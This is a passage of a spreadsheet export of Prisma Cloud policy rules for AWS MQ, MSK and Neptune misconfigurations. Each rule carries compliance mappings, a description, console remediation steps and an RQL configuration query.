          <t>config from cloud.resource where api.name = 'aws-mq-broker' AND json.rule = brokerState equal ignore case RUNNING as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equal ignore case Enabled and keyMetadata.keyManager does not equal ignore case CUSTOMER as Y; filter '$.X.encryptionOptions.kmsKeyId equals $.Y.keyMetadata.arn or $.X.encryptionOptions.useAwsOwnedKey is true'; show X;
{"category":"General","resourceTypes":["aws_mq_broker"]}</t>
        </is>
      </c>
      <c r="AA2033" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2033" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2033" t="inlineStr">
        <is>
          <t>PC-AWS-MQ-1115-CKV_AWS_209</t>
        </is>
      </c>
      <c r="AD2033" t="b">
        <v>1</v>
      </c>
      <c r="AE2033" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2033" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>9f2f330d-b9bd-4154-b768-a03489587584</t>
        </is>
      </c>
      <c r="AI2033" t="inlineStr">
        <is>
          <t>052988c4-ae35-4725-997b-02a888356274</t>
        </is>
      </c>
      <c r="AJ2033" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2033" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2034">
      <c r="A2034" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, ITSG-33, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, SOC 2, DORA, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2034" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2034" s="2" t="inlineStr"/>
      <c r="D2034" t="inlineStr"/>
      <c r="E2034" t="inlineStr"/>
      <c r="F2034" t="inlineStr"/>
      <c r="G2034" t="b">
        <v>1</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2034" t="inlineStr">
        <is>
          <t>aws-msk</t>
        </is>
      </c>
      <c r="K2034" t="inlineStr">
        <is>
          <t>AWS MSK cluster encryption in transit is not enabled</t>
        </is>
      </c>
      <c r="L2034" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2034" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2034" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2034" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2034" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2034" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2034" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2034" t="inlineStr"/>
      <c r="T2034" t="b">
        <v>0</v>
      </c>
      <c r="U2034" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2034" t="inlineStr">
        <is>
          <t>aws-msk-cluster</t>
        </is>
      </c>
      <c r="W2034" t="inlineStr">
        <is>
          <t>This policy identifies AWS Managed Streaming for Apache Kafka clusters having in-transit encryption in a disabled state.
In-transit encryption secures data while it's being transferred between brokers. Without it, there's a risk of data interception during transit.
It is recommended to enable in-transit encryption among brokers within the cluster. This ensures that all data exchanged within the cluster is encrypted, effectively protecting it from potential eavesdropping and unauthorized access.</t>
        </is>
      </c>
      <c r="X2034" t="inlineStr">
        <is>
          <t>To enable in-transit encryption both within the cluster and client broker communication has to be configured with TLS.
To enable TLS encryption for client-broker communication, follow the below steps:
1. Sign in to the AWS Management Console and open the Amazon MSK console at https://console.aws.amazon.com/msk/.
2. On the navigation menu, choose 'Clusters', and select the MSK cluster for which you want to enable or edit in-transit encryption.
3. Under the 'Actions' dropdown, select 'Edit security settings'. 
4. Under 'Encryption', please uncheck the 'Plaintext' option and make sure the 'TLS encryption' option is selected for  'Between clients and brokers' encryption configuration.
5. Click on 'Update' to save changes.
Enabling TLS encryption for within-cluster communication involves creating a new cluster. To create a new cluster, please follow the below steps:
1. Sign in to the AWS Management Console and open the Amazon MSK console at https://console.aws.amazon.com/msk/.
2. On the navigation menu, choose 'Clusters', then select 'Create cluster'.
3. Under the 'Create Cluster' page, please configure the cluster as per the requirements.
4. At Step 3, under 'Encryption', select 'TLS encryption' for the 'Between clients and brokers' checkbox.
5. Select 'TLS encryption' for the 'Within the cluster' checkbox.
6. After providing the required configuration in the remaining steps, Under step 5, click on 'Create cluster'. 
Build Recommendation: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/bc_aws_general_32
IaC: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/bc_aws_general_32</t>
        </is>
      </c>
      <c r="Y2034" t="inlineStr"/>
      <c r="Z2034" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-msk-cluster' AND json.rule = state equal ignore case active and encryptionInfo.encryptionInTransit.clientBroker contains PLAINTEXT or encryptionInfo.encryptionInTransit.inCluster is false
{"category":"General","resourceTypes":["aws_msk_cluster"]}</t>
        </is>
      </c>
      <c r="AA2034" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2034" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2034" t="inlineStr">
        <is>
          <t>PC-AWS-MSK-1124-CKV_AWS_81</t>
        </is>
      </c>
      <c r="AD2034" t="b">
        <v>1</v>
      </c>
      <c r="AE2034" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2034" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>33a02806-aa4b-4c6a-b753-3f7de6e6313c</t>
        </is>
      </c>
      <c r="AI2034" t="inlineStr">
        <is>
          <t>18d55f5a-c4de-4fc1-9346-c95b523f58d0</t>
        </is>
      </c>
      <c r="AJ2034" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2034" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2035">
      <c r="A2035" t="inlineStr">
        <is>
          <t>ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, ITSG-33, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, ITSG-33, TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CSA CCM v4.0.12, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2035" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2035" s="2" t="inlineStr"/>
      <c r="D2035" t="inlineStr"/>
      <c r="E2035" t="inlineStr"/>
      <c r="F2035" t="inlineStr"/>
      <c r="G2035" t="b">
        <v>1</v>
      </c>
      <c r="H20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35" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2035" t="inlineStr">
        <is>
          <t>aws-msk</t>
        </is>
      </c>
      <c r="K2035" t="inlineStr">
        <is>
          <t>AWS MSK clusters not configured with enhanced monitoring</t>
        </is>
      </c>
      <c r="L2035" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2035" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2035" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2035" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2035" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2035" t="inlineStr">
        <is>
          <t>IR</t>
        </is>
      </c>
      <c r="R2035" t="inlineStr">
        <is>
          <t>IR-05-00 : Incident Monitoring</t>
        </is>
      </c>
      <c r="S2035" t="inlineStr"/>
      <c r="T2035" t="b">
        <v>0</v>
      </c>
      <c r="U2035" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2035" t="inlineStr">
        <is>
          <t>aws-msk-cluster</t>
        </is>
      </c>
      <c r="W2035" t="inlineStr">
        <is>
          <t>This policy identifies MSK clusters that are not configured with enhanced monitoring.
Amazon MSK is a fully managed Apache Kafka service on AWS that handles the provisioning, setup, and maintenance of Kafka clusters. Amazon MSK's PER_TOPIC_PER_BROKER monitoring level provides granular insights into the audit, performance and resource utilization of individual topics and brokers, enabling you to identify and optimize bottlenecks in your Kafka cluster.
It is recommended to enable at least PER_TOPIC_PER_BROKER monitoring on the MSK cluster to get enhanced monitoring capabilities.</t>
        </is>
      </c>
      <c r="X2035" t="inlineStr">
        <is>
          <t>To configure MSK clusters with enhanced monitoring:
1. Sign in to the AWS console. Navigate to the Amazon MSK console.
2. In the navigation pane, choose 'Clusters'. Then, select the reported cluster.
3. For 'Action', select 'Edit monitoring'.
4. Select either 'Enhanced partition-level monitoring' or  'Enhanced topic-level monitoring' option.
5. Choose 'Save changes'.</t>
        </is>
      </c>
      <c r="Y2035" t="inlineStr"/>
      <c r="Z2035" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-msk-cluster' AND json.rule = state equal ignore case active and enhancedMonitoring is member of (DEFAULT, PER_BROKER)</t>
        </is>
      </c>
      <c r="AA2035" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2035" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2035" t="inlineStr">
        <is>
          <t>PC-AWS-MSK-1238</t>
        </is>
      </c>
      <c r="AD2035" t="b">
        <v>1</v>
      </c>
      <c r="AE2035" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2035" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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35" t="inlineStr">
        <is>
          <t>a01a150a-64bb-4e1e-9f2e-3f4b29c61215</t>
        </is>
      </c>
      <c r="AI2035" t="inlineStr">
        <is>
          <t>11e91f14-f998-446d-a04d-255c8776208c</t>
        </is>
      </c>
      <c r="AJ2035" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2035" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2036">
      <c r="A2036" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ITSG-33, GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2036" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2036" s="2" t="inlineStr"/>
      <c r="D2036" t="inlineStr"/>
      <c r="E2036" t="inlineStr"/>
      <c r="F2036" t="inlineStr"/>
      <c r="G2036" t="b">
        <v>1</v>
      </c>
      <c r="H20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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2036" t="inlineStr">
        <is>
          <t>aws-neptune</t>
        </is>
      </c>
      <c r="K2036" t="inlineStr">
        <is>
          <t>AWS Neptune DB cluster does not publish audit logs to CloudWatch Logs</t>
        </is>
      </c>
      <c r="L2036" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2036" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2036" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2036" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2036" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2036" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2036" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2036" t="inlineStr"/>
      <c r="T2036" t="b">
        <v>0</v>
      </c>
      <c r="U2036" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2036" t="inlineStr">
        <is>
          <t>aws-neptune-db-cluster</t>
        </is>
      </c>
      <c r="W2036" t="inlineStr">
        <is>
          <t>This policy identifies Amazon Neptune DB clusters where audit logging is disabled or audit logs are not published to Amazon CloudWatch Logs.
Neptune DB integrates with Amazon CloudWatch for performance metric gathering and analysis, supporting CloudWatch Alarms. While Neptune DB provides customizable audit logs for monitoring database operations, these logs are not automatically sent to CloudWatch Logs, limiting centralized monitoring and analysis of database activities.
It is recommended to configure the Neptune DB cluster to enable audit logs and publish audit logs to CloudWatch logs.</t>
        </is>
      </c>
      <c r="X2036" t="inlineStr">
        <is>
          <t>To create a custom parameter group if the cluster has only the default parameter group use the following steps: 
1. Sign in to the AWS Management Console and open the Amazon Neptune DB console. 
2. In the navigation pane, choose 'Parameter groups'. 
3. Choose 'Create'. The 'Create cluster parameter group' window appears. 
4. In the 'Parameter group family' list, select a 'DB parameter group family'.
5. In the 'Parameter group type', Select 'DB cluster parameter group'.
6. In the 'New cluster parameter group name', enter the name of the new DB cluster parameter group. 
7. In the Description box, enter a description for the new DB cluster parameter group. 
8. Click 'Create'. 
To modify the custom DB cluster parameter group to enable query logging, follow the below steps: 
1. Sign in to the AWS Management Console and open the Amazon Neptune DB console. 
2. In the navigation pane, choose 'Parameter groups'. 
3. In the list, choose the above-created parameter group or the reported resource custom parameter group that you want to modify. 
4. Change the value of the 'neptune_enable_audit_log' parameter to '1' in the value drop-down and click on tick mark for enabling audit logs.
To modify an Amazon Neptune DB Cluster to use the custom parameter group, follow the below steps: 
1. Sign in to the AWS Management Console and open the Amazon Neptune DB console. 
2. In the navigation pane, choose 'Databases', and then choose the 'DB instance' that you want to modify. 
3. Choose the reported cluster that you want to associate your parameter group with. Choose 'Actions', and then choose 'Modify' to modify your cluster. 
4. Under 'Additional settings', select the above-created cluster parameter group from the DB parameter group dropdown. 
5. Choose 'Continue' and check the summary of modifications. 
6. On the confirmation page, review your changes. If they are correct, choose 'Modify cluster' to save your changes. 
To modify an Amazon Neptune DB cluster for enabling export logs to cloudwatch, follow the below steps: 
1. Sign in to the AWS Management Console and open the Amazon Neptune DB console. 
2. In the navigation pane, choose 'Databases', and then choose the 'DB instance' that you want to modify. 
3. Choose the reported cluster that you want to associate your parameter group with. Choose 'Actions', and then choose 'Modify' to modify your cluster.
4. Scroll down to the Log exports section, and choose 'Enable' for the 'Audit logs'.
5. Choose 'Continue'.
6. Choose 'Modify cluster'.</t>
        </is>
      </c>
      <c r="Y2036" t="inlineStr"/>
      <c r="Z2036" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-neptune-db-cluster' AND json.rule = Status equals "available" as X; config from cloud.resource where api.name = 'aws-neptune-db-cluster-parameter-group' AND json.rule = parameters.neptune_enable_audit_log.ParameterValue exists and parameters.neptune_enable_audit_log.ParameterValue equals 0 as Y; filter '($.X.EnabledCloudwatchLogsExports.member does not contain "audit") or $.X.DBClusterParameterGroup equals $.Y.DBClusterParameterGroupName' ; show X;</t>
        </is>
      </c>
      <c r="AA2036" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2036" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2036" t="inlineStr">
        <is>
          <t>PC-AWS-NEP-1161</t>
        </is>
      </c>
      <c r="AD2036" t="b">
        <v>1</v>
      </c>
      <c r="AE2036" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2036" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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6" t="inlineStr">
        <is>
          <t>b37b487d-894a-4035-9533-3cfa7e4f62b1</t>
        </is>
      </c>
      <c r="AI2036" t="inlineStr">
        <is>
          <t>51c61370-db91-4773-9817-42ac176f6096</t>
        </is>
      </c>
      <c r="AJ2036" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2036" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2037">
      <c r="A2037" t="inlineStr">
        <is>
          <t>HIPAA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST SP 800-171 Revision 3, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, DORA, TX-RAMP Level 2, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, SOC 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, ITSG-33, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2037" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2037" s="2" t="inlineStr"/>
      <c r="D2037" t="inlineStr"/>
      <c r="E2037" t="inlineStr"/>
      <c r="F2037" t="inlineStr"/>
      <c r="G2037" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2037" t="inlineStr">
        <is>
          <t>aws-neptune</t>
        </is>
      </c>
      <c r="K2037" t="inlineStr">
        <is>
          <t>AWS Neptune Cluster not configured with IAM authentication</t>
        </is>
      </c>
      <c r="L2037" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2037" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2037" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2037" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2037" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2037" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2037" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2037" t="inlineStr"/>
      <c r="T2037" t="b">
        <v>0</v>
      </c>
      <c r="U2037" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2037" t="inlineStr">
        <is>
          <t>aws-neptune-db-cluster</t>
        </is>
      </c>
      <c r="W2037" t="inlineStr">
        <is>
          <t>This policy identifies AWS Neptune clusters that are not configured with IAM authentication. If you enable IAM authentication you don't need to store user credentials in the database, because authentication is managed externally using IAM. IAM database authentication ensures the network traffic to and from database clusters is encrypted using Secure Sockets Layer (SSL), provides central access management to your database resources and enforces use of profile credentials instead of a password, for greater security.</t>
        </is>
      </c>
      <c r="X2037" t="inlineStr">
        <is>
          <t>To enable IAM authentication for AWS Neptune cluster follow the steps mentioned in below URL:
https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth-enable.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-359
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-359</t>
        </is>
      </c>
      <c r="Y2037" t="inlineStr"/>
      <c r="Z2037" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-neptune-db-cluster' AND json.rule = Status contains available and IAMDatabaseAuthenticationEnabled is false
{"category":"IAM","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA2037" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2037" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2037" t="inlineStr">
        <is>
          <t>PC-AWS-NEP-913-CKV_AWS_359</t>
        </is>
      </c>
      <c r="AD2037" t="b">
        <v>1</v>
      </c>
      <c r="AE2037" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2037" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>6707ee28-06c8-45a9-8caf-ecc0df8d62d2</t>
        </is>
      </c>
      <c r="AI2037" t="inlineStr">
        <is>
          <t>48e2b40e-f487-4e94-ac22-a330a829f877</t>
        </is>
      </c>
      <c r="AJ2037" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2037" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2038">
      <c r="A2038" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-171 Revision 3, MLPS 2.0 (Level 2), TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, ITSG-33, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2038" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2038" s="2" t="inlineStr"/>
      <c r="D2038" t="inlineStr"/>
      <c r="E2038" t="inlineStr"/>
      <c r="F2038" t="inlineStr"/>
      <c r="G2038" t="b">
        <v>1</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2038" t="inlineStr">
        <is>
          <t>aws-neptune</t>
        </is>
      </c>
      <c r="K2038" t="inlineStr">
        <is>
          <t>AWS Neptune cluster deletion protection is disabled</t>
        </is>
      </c>
      <c r="L2038" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2038" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2038" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2038" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2038" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2038" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R2038" t="inlineStr">
        <is>
          <t>CM-02-00 : Baseline Configuration</t>
        </is>
      </c>
      <c r="S2038" t="inlineStr"/>
      <c r="T2038" t="b">
        <v>0</v>
      </c>
      <c r="U2038" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2038" t="inlineStr">
        <is>
          <t>aws-neptune-db-cluster</t>
        </is>
      </c>
      <c r="W2038" t="inlineStr">
        <is>
          <t>This policy identifies AWS Neptune clusters for which deletion protection is disabled. Enabling deletion protection for Neptune clusters prevents irreversible data loss resulting from accidental or malicious operations.</t>
        </is>
      </c>
      <c r="X2038" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to Neptune Dashboard
4. Select the reported Neptune cluster
5. Click on 'Modify' from top
6. Under 'Deletion protection' select 'Enable deletion protection'
7. Click on 'Continue'
8. Schedule the modifications and click on 'Modify cluster' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-58
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-58</t>
        </is>
      </c>
      <c r="Y2038" t="inlineStr"/>
      <c r="Z2038" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-neptune-db-cluster' AND json.rule = Status contains available and DeletionProtection is false
{"category":"General","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA2038" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2038" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2038" t="inlineStr">
        <is>
          <t>PC-AWS-NEP-915-CKV2_AWS_58</t>
        </is>
      </c>
      <c r="AD2038" t="b">
        <v>1</v>
      </c>
      <c r="AE2038" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2038" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>fd9b71b1-a601-4c6b-b6f2-a8290ece5680</t>
        </is>
      </c>
      <c r="AI2038" t="inlineStr">
        <is>
          <t>a07cf01a-a77c-4947-ac7f-498e8254b707</t>
        </is>
      </c>
      <c r="AJ2038" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2038" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2039">
      <c r="A2039" t="inlineStr"/>
      <c r="B2039" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2039" s="2" t="inlineStr"/>
      <c r="D2039" t="inlineStr"/>
      <c r="E2039" t="inlineStr"/>
      <c r="F2039" t="inlineStr"/>
      <c r="G2039" t="b">
        <v>1</v>
      </c>
      <c r="H20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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2039" t="inlineStr">
        <is>
          <t>aws-neptune</t>
        </is>
      </c>
      <c r="K2039" t="inlineStr">
        <is>
          <t>AWS Neptune DB clusters have backup retention period less than 7 days</t>
        </is>
      </c>
      <c r="L2039" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2039" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2039" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2039" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2039" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2039" t="inlineStr"/>
      <c r="R2039" t="inlineStr"/>
      <c r="S2039" t="inlineStr"/>
      <c r="T2039" t="b">
        <v>0</v>
      </c>
      <c r="U2039" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2039" t="inlineStr">
        <is>
          <t>aws-neptune-db-cluster</t>
        </is>
      </c>
      <c r="W2039" t="inlineStr">
        <is>
          <t>This policy identifies Amazon Neptune DB clusters lacking sufficient backup retention tenure.
AWS Neptune DB is a fully managed graph database service. The backup retention period denotes the duration for storing automated backups of the Neptune DB clusters. Inadequate retention periods heighten the risk of data loss, and compliance issues, and hinder effective recovery in security breaches or system failures.
It is recommended to ensure a backup retention period of at least 7 days or according to your business and compliance requirements.</t>
        </is>
      </c>
      <c r="X2039" t="inlineStr">
        <is>
          <t>To modify an Amazon Neptune DB cluster's backup retention period, perform the following actions:
1. Sign in to the AWS Management Console
2. Select the region from the dropdown in the top right corner where the alert is generated
3. In the Navigation Panel on the left, under 'Database', select 'Neptune'
4. Under ‘Databases', select 'Clusters' and choose the reported cluster name
5. Click 'Modify' from the top right corner 
6. Under the 'Additional settings' section, Click the 'Show more' dropdown 
7. Select the desired backup retention period in days from the 'Backup retention period' drop-down menu based on your business or compliance requirements 
8. Click 'Next' to review the summary of your changes 
9. Choose either 'Apply during the next scheduled maintenance window' or 'Apply immediately' based on your scheduling preference
10. Click on 'Submit' to implement the changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-361
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-361</t>
        </is>
      </c>
      <c r="Y2039" t="inlineStr"/>
      <c r="Z2039" t="inlineStr">
        <is>
